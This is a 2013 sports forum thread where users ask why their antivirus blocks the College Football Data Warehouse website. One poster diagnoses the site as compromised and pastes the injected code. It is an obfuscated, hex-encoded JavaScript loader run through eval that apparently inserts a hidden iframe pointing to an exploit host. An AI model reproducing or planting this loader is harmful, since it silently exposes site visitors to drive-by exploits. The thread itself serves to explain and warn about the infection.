CSNbbs

Full Version: College Football Data Warehouse has a Virus???
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
Within the last 2 weeks, I have been going to College Football Data Warehouse to check historical football info. For some reason my Avast is shutting it down and telling a "threat has been detected". Anybody got a clue why? Can I make an exception in my Avast software to allow this site, or would that be a bad idea?
Great site. No problems here.
Try updating your virus definitions
I'll give it a try. But it updates automatically every day... sometimes twice a day.
Yep, up to date. Tried again...

Trojan Horse Blocked

Infection: js:CookieBomb-A [Trj]
i go cfbdatawarehouse a few times a week

never had the slightest issue
I'm thinking you have some sort of separate ad blocker? If so, try downgrading the security setting-or disable the ad blocker when you go to the cfb site.
Apparently your ad blocker recognizes that site as a spamorific cookiebomb.
Just speculating here.
(08-11-2013 06:06 PM)geosnooker2000 Wrote: [ -> ]Yep, up to date. Tried again...

Trojan Horse Blocked

Infection: js:CookieBomb-A [Trj]

just be glad you aren't getting the virus while the other people whose anti-virus program doesn't detect the virus are getting it
Nope. Still... "Threat has been detected".
(08-11-2013 10:21 PM)geosnooker2000 Wrote: [ -> ]Nope. Still... "Threat has been detected".

I'm using the same anti-virus software and got the same warning message when I visited the website.
(08-11-2013 11:03 PM)Harry J Wrote: [ -> ]
(08-11-2013 10:21 PM)geosnooker2000 Wrote: [ -> ]Nope. Still... "Threat has been detected".

I'm using the same anti-virus software and got the same warning message when I visited the website.

Oh, good. Then it's not just me.

Thank you for letting me know.
I just logged in using the link-Norton came back with CVE-2013-1493 RCE

Severity: High
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description
This signature detects attempts to exploit a remote code execution vulnerability in Oracle Java SE.

Additional Information
Oracle Java SE is prone to a remote code execution vulnerability that leads to arbitrary memory read and write in the JVM process. This issue allows attackers to corrupt the memory and disable the Security Manager component.

An attacker can exploit this issue to execute arbitrary code in the context of the application.

This vulnerability affects the following supported versions:

JDK and JRE 7 Update 15 and prior
JDK and JRE 6 Update 41 and prior
JDK and JRE 5.0 Update 40 and prior

Affected
JDK and JRE 7 Update 15 and prior
JDK and JRE 6 Update 41 and prior
JDK and JRE 5.0 Update 40 and prior


Additional References
CVE-2013-1493
Security Focus BID: 58238

If you're accessing this site you should scan your computer
(08-11-2013 10:21 PM)geosnooker2000 Wrote: [ -> ]Nope. Still... "Threat has been detected".

My AVS had a pop up and it detected two Trojan horses on the site.
Man, That sucks. I really liked that site.
That site has been compromised. The code below is obfuscated JavaScript that creates an IFRAME HTML tag. Within that IFRAME is a reference to a site hosting an exploit.


Code:
{if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e71877876792e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e71877876793c8180712e4b2e357682827e483d3d7e767d827d817380847771737a6f8277816f7c6f3c77823d8666855b705478643c7e767e3549182e71877876793c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e71877876793c8182877a733c707d807273802e4b2e353e3549182e71877876793c8182877a733c7673777576822e4b2e35477e863549182e71877876793c8182877a733c85777282762e4b2e35457e863549182e71877876793c8182877a733c7a7374822e4b2e353f7e863549182e71877876793c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c8250875772363571877876793537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a3571877876796a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c82508757723635718778767935373c6f7e7e737c725176777a723671877876793749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));</script><!--/0f2490--
(08-11-2013 05:54 PM)geosnooker2000 Wrote: [ -> ]Within the last 2 weeks, I have been going to College Football Data Warehouse to check historical football info. For some reason my Avast is shutting it down and telling a "threat has been detected". Anybody got a clue why? Can I make an exception in my Avast software to allow this site, or would that be a bad idea?

I think the ads are based on your search preferences.
Clever.
(08-12-2013 09:42 AM)tiger2000 Wrote: [ -> ]That site has been compromised. The code below is obfuscated JavaScript that creates an IFRAME HTML tag. Within that IFRAME is a reference to a site hosting an exploit.

Can they fix it?
(08-12-2013 12:03 PM)geosnooker2000 Wrote: [ -> ]
(08-12-2013 09:42 AM)tiger2000 Wrote: [ -> ]That site has been compromised. The code below is obfuscated JavaScript that creates an IFRAME HTML tag. Within that IFRAME is a reference to a site hosting an exploit.

Can they fix it?

Seriously, I'd like to know.
Pages: 1 2
Reference URL's